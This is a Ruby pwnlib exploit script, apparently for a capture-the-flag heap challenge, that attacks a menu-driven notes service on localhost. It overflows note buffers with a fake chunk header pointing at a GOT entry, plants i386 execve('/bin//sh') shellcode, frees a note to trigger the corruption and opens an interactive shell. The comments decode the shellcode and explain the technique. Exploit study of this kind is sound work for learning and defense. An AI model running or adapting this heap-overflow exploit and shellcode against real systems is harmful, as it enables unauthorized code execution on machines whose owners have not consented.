# coding: ascii-8bit
# Thanks to @Charo_IT
# https://github.com/Charo-IT/pwnlib
require 'pwnlib.rb'
# Exploit for a menu-driven "notes" service, spoken to through a pwnlib
# PwnTube: it allocates three notes, rewrites notes 1 and 0 with payloads
# longer than the size they were created with (what looks like a fake chunk
# header, then i386 shellcode), frees note 2 and hands over an interactive
# shell. The target below and every address in the script are hard-coded
# for one particular build of the binary and will need recomputing for any
# other.
host = "localhost"
port = 8888
# Allocate the three notes the rest of the exploit works on.
#
# Each round waits for the menu banner and then answers menu option 1
# followed by 100 in a single write. Judging by the prompts change_note
# consumes, 100 is presumably the requested note size -- the service's
# prompts for option 1 are not read back individually here.
#
# tube - any object responding to recv_until(marker) and send(data).
def setup_notes(tube)
  menu = "Please choose an option.\n"
  3.times do
    print tube.recv_until(menu)
    tube.send("1\n100\n")
  end
end
# Drive menu option 3 (editing an existing note).
#
# The service asks for an id, a size and the data in turn; each answer is
# echoed locally before it is sent, line-terminated. data_size is forwarded
# verbatim and never checked against data here: the caller deliberately
# passes a size larger than the one the note was created with, which is
# presumably what lets the data overflow the note's buffer -- confirm
# against the target binary.
#
# tube      - object responding to recv_until(marker) and send(data).
# id        - note index as the service numbers it.
# data_size - size answer sent to the service.
# data      - raw bytes written into the note (a newline is appended).
def change_note(tube, id, data_size, data)
  # Wait for `prompt`, echo `reply`, then send it terminated by a newline.
  answer = lambda do |prompt, reply|
    print tube.recv_until(prompt)
    puts reply
    tube.send("#{reply}\n")
  end
  answer.call("Please choose an option.\n", "3")
  answer.call("Please give me an id.\n", id)
  answer.call("Please give me a size.\n", data_size)
  answer.call("Please input your data.\n", data)
end
# Drive menu option 2 (removing a note): answer the menu with 2, then the
# id prompt with `id`, echoing each answer locally before sending it.
#
# tube - object responding to recv_until(marker) and send(data).
# id   - note index as the service numbers it.
def remove_note(tube, id)
  exchange = [
    ["Please choose an option.\n", "2"],
    ["Please give me an id.\n", id]
  ]
  exchange.each do |prompt, reply|
    print tube.recv_until(prompt)
    puts reply
    tube.send("#{reply}\n")
  end
end
PwnTube.open(host, port) do |tube|
  tube.debug = true

  # Address the fake chunk's forward pointer is aimed at.
  # NOTE(review): the variable is named puts_plt, but 0x804a008 sits where
  # .got.plt lives in a typical non-PIE i386 binary, so this is more likely
  # puts' GOT slot than its PLT stub -- confirm with `objdump -R` on the
  # target. Either way it is specific to this build and breaks on any other.
  puts_plt = 0x804a008

  setup_notes(tube)

  # Note 1: 108 filler bytes, then what the original author labelled a size
  # field (0x79) and a pointer to puts_plt - 8. Presumably the pointer is the
  # fd of a fake chunk whose user data (chunk + 8 on 32-bit glibc) lands on
  # the GOT slot; the heap layout that makes the offsets line up is not
  # visible from this script.
  filler = "JUNK" * 27
  fake_chunk = filler + p32(0x79) + p32(puts_plt - 8)
  change_note(tube, 1, fake_chunk.length, fake_chunk)

  # Note 0: the same filler, then i386 execve("/bin//sh", ["/bin//sh"], NULL)
  # shellcode, decoded here from the opcodes themselves.
  shellcode = ""
  shellcode << "\x31\xd2"                 # xor  edx, edx       ; edx = 0 (envp, string terminator)
  shellcode << "\x52"                     # push edx            ; NUL that terminates "/bin//sh"
  shellcode << "\x68" + "JUNK" + "\x58"   # push 'JUNK' ; pop eax -- keeps the JUNK pattern going;
                                          # has no effect, eax is overwritten by the lea below
  shellcode << "\x68\x2f\x2f\x73\x68"     # push "//sh"
  shellcode << "\x68\x2f\x62\x69\x6e"     # push "/bin"
  shellcode << "\x89\xe3"                 # mov  ebx, esp       ; ebx -> "/bin//sh"
  shellcode << "\x52\x53"                 # push edx ; push ebx ; argv = ["/bin//sh", NULL]
  shellcode << "\x89\xe1"                 # mov  ecx, esp       ; ecx -> argv
  shellcode << "\x8d\x42\x0b"             # lea  eax, [edx+0xb] ; eax = 11 = SYS_execve
  shellcode << "\xcd\x80"                 # int  0x80
  stage = filler + shellcode
  change_note(tube, 0, stage.length, stage)

  # Freeing note 2 is what puts the corrupted metadata to use; if it worked,
  # the next call lands in the shell spawned by the code above.
  remove_note(tube, 2)
  tube.shell
end